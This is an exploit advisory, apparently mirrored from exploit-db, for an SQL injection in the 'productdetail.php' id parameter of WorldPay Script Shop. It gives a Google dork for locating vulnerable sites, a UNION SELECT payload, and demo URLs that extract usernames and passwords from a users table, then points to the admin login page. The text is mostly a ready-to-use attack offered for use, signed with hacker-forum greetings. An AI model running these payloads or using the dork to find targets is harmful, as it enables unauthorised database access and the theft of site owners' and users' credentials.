WorldPay Script Shop – ‘productdetail’ SQL Injection

  • 作者: Err0R
    日期: 2010-01-03
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/10976/
  • ============================================
    | WorldPay Script Shop (productdetail) SQL Injection Vulnerability
    ============================================
    # (+) Author: Err0R
    # (+) Site : www.sa-hacker.com/vb<http://www.sa-hacker.com/vb>
    # (+) Email : a5q@hotmail.com<mailto:a5q@hotmail.com>
    =====================================
    ~~~~~~~~~~~~~~~~~~~~
    dork (Google): intext:"Powered By WorldPay" inurl:productdetail.php
    ~~~~~~~~~~~~~~~~~~~~
    Exploit : Site /path/productdetail.php?id=-231+union+select+1,2,3,4,5--
    And you come the enject ,,
    Demo :-
    User name : http://server/productdetail.php?id=-231+union+select+1,2,3,userName,5+from+watch2td_db.tbl_users<http://server/productdetail.php?id=-231+union+select+1,2,3,userName,5+from+watch2td_db.tbl_users>--
    Password : http://server/productdetail.php?id=-231+union+select+1,2,3,password,5+from+watch2td_db.tbl_users<http:http://server/productdetail.php?id=-231+union+select+1,2,3,password,5+from+watch2td_db.tbl_users>--
    admin Login : Site /path/login.php
    =============================================================
    #====GreeTZ===============#
    #all member in www.sa-hacker.com/vb<http://www.sa-hacker.com/vb> #
    #and all in My email : ) #
    #======================#